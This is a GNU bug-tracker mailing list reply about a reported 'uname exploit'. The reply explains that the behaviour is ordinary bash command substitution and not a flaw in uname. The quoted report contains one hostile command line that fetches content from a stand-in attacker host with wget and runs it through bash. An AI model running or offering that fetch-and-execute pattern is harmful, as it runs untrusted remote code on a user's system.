[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
bug#24328: uname exploit
From: |
Evan J Johnson |
Subject: |
bug#24328: uname exploit |
Date: |
Mon, 29 Aug 2016 08:47:22 -0700 |
Hey Shane,
I'm no bash/systems/coreutils expert, but I believe this behavior is
completely expected, independent of uname, and documented.
$(...) is the command substitution syntax and it will cause the command
inside the parens to be run, with the output used as input. Here's a
link to the behavior on gnu.org.
https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution
It won't work if you use single quotes, which is also expected.
Evan
On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote:
> Hi, I am unsure if you have seen this, but I am concerned about this -
> can or should uname be restricted to root use only?
>
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
>
>
>
>
>